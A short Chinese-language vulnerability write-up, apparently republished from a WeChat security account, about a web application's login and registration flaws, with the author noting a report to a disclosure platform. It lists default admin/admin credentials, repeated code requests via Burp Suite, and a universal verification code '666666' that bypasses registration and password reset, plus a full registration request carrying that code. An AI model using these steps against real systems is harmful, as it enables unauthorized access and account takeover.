直接使用admin和admin即可进入后台管理系统;
直接“注册”用户,输入手机号或者邮箱获取验证码,BurpSuite抓包获取验证码的数据包,不断发送即可接收到验证码信息;
(备注:这里实际获取验证码有点问题,无法收到)
直接使用“666666”验证码即可跳转到下一步设置昵称、密码等信息;
选择“忘记密码”输入手机号或者邮箱获取验证码,输入:666666即可跳转到下一步直接设置新密码;
BurpSuite获取该数据包,替换其中内容即可;
POST /account/register HTTP/1.1
Host:
Content-Length: 186
Accept: application/json, text/plain, */*
operationID:
User-Agent:
Content-Type: application/json
Origin:
Referer:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
{"verifyCode":"666666","autoLogin":true,"user":{"nickname":"替换","faceURL":"","areaCode":"+86","phoneNumber":"替换","password":"替换(MD5值)"}}
(补天漏洞响应平台审核速度蛮快的的,很加分!)
原文始发于微信公众号(青春计协):一次简单通用漏洞挖掘
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论